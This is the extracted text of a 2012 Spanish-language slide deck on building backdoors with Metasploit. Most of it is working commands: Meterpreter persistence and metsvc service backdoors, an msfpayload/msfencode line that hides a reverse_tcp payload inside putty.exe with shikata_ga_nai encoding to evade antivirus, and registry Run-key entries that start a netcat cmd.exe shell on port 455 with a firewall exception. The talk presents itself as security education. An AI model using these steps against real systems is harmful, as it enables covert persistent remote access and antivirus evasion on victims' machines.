Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo,

Tamaño: px

Comenzar la demostración a partir de la página:

Download "Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com"

Cristián Ponce Segura
hace 8 años
Vistas:

1 Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino

2 Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador de seguridad de información para La Positiva Vida. Consultor en seguridad de información. 10 años de experiencia en seguridad de información Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres:

3 El objetivo principal de este videotutorial es identificar y promover el uso de herramientas Open Source en el ámbito de seguridad de información, a través del uso del Sistema Operativo Bactrack Linux para la explotación de vulnerabilidades y manteniendo de acceso por medio de backdoors en el sistema vulnerado. Los objetivos específicos son: Identificar los diferentes mecanismos de creación de puertas traseras (backdoors) que permitan el ingreso automatizo a los equipos vulnerados. Mostrar los diversos mecanismos para evadir la detección de backdoors a través de técnicas de encoding. Realizar pruebas de mantenimiento de acceso tras el reinicio del Sistema Operativo.

4 Explotación de la vulnerabilidad Explicación de las técnicas de creación de backdoors Técnicas de evasión de antivirus (encoding) Pruebas finales y conclusiones TÉCNICAS DE CREACIÓN DE BACKDOORS Técnicas de instalación de Backdoors Modificación del sistema de registros (REGEDIT) Instalación de ejecutables como servicio en el S.O RUN PERSISTENCE RUN METSVC 1 2

5 TÉCNICAS DE CREACIÓN DE BACKDOORS Técnicas de instalación de Backdoors Modificación del sistema de registros (REGEDIT) RUN PERSISTENCE 1 Instalación de ejecutables como servicio en el S.O RUN METSVC COMANDOS: Meterpreter> run persistence -h Meterpreter> run persistence A L C:\\ -X i 10 p 443 r <dirección IP BT> Meterpreter> reboot Meterpreter> resource <ruta para desinstalación de backdoor>

6 TÉCNICAS DE CREACIÓN DE BACKDOORS Modificación del sistema de registros (REGEDIT) RUN PERSISTENCE Técnicas de instalación de Backdoors Instalación de ejecutables como servicio en el S.O RUN METSVC 2 COMANDOS: Meterpreter> run metsvc h Meterpreter> run metsvc A Meterpreter> use exploit/multi/handler Meterpreter> set payload windows/metsvc_bind_tcp Meterpreter> show options Meterpreter> exploit Meterpreter> run metsvc -r

7 Explotación de la vulnerabilidad Explicación de las técnicas de creación de backdoors Técnicas de evasión de antivirus (encoding) Pruebas finales y conclusiones TÉCNICAS DE EVASIÓN DE ANTIVIRUS Técnicas de evasión de ANTIVIRUS ENCODING: SHIKATA_GA_NAI Instalación NETCAT MSFENCONDE REGEDIT 3 4

8 TÉCNICAS DE EVASIÓN DE ANTIVIRUS Técnicas de evasión de ANTIVIRUS ENCODING: SHIKATA_GA_NAI MSFENCONDE 3 Instalación NETCAT REGEDIT COMANDOS: 1.- Descargar putty.exe 2.- Crear payload codificado: Root# msfpayload windows/meterpreter/reverse_tcp LHOST=<IP BT> R msfencode t exe x putty.exe k o puttybd.exe e x86/shikata_ga_nai c 5 Meterpreter> use exploit/multi/handler Meterpreter> set payload windows/meterpreter/reverse_tcp Meterpreter> set LHOST Meterpreter> set LPORT Meterpreter> exploit

9 DETECCIÓN DE ANTIVIRUS Total de antivirus Sin encoding Encoding Shikata Ga Nai Encoding Shikata Ga Nai + UPX 15 Encoding Shikata Ga Nai + Countdown Total de antivirus Sin encoding Encoding Shikata Ga Nai Encoding Shikata Ga Nai + UPX Encoding Shikata Ga Nai + Countdown Encoding Shikata Ga Nai + Countdown + UPX Encoding Shikata Ga Nai + Countdown + call4_dword_xor Encoding Shikata Ga Nai + Countdown + UPX Encoding Shikata Ga Nai + Countdown + call4_dword_xor

10 TÉCNICAS DE EVASIÓN DE ANTIVIRUS Técnicas de evasión de ANTIVIRUS ENCODING: SHIKATA_GA_NAI MSFENCONDE Instalación NETCAT REGEDIT 4 COMANDOS: 1.- Descargar NETCAT para windows 2.- Modificar registro: Meterpreter> upload nc.exe C:\\Windows\\system32\\ Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe - Ldp 455 -e cmd.exe' Meterpreter> execute -f cmd -i Meterpreter> netsh firewall show portopening Meterpreter> netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL 3.- Conexión al cliente ROOT# nc -v <IP_VICTIMA> 455

11 Sistema Operativo Bactrack GNU Linux contiene la mejor suite de herramientas de auditoría de seguridad de información para construir puertas traseras. Las puertas traseras construidas con Metasploit funcionan correctamente en sistemas operativos sin antivirus y sin firewall interno (no funcionan en caso contrario). Shikata ga nai es una técnica de codificación que permite evadir más del 50% de antivirus del mercado. Las técnicas de codificación no logran evadir todos los antivirus del mercado. Se utilizaron técnicas de modificación de registros y configuración manual del firewall para instalar puertas traseras que funcionen correctamente en sistemas con antivirus y firewall activos.

12 Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino

Documentos relacionados

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com

Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador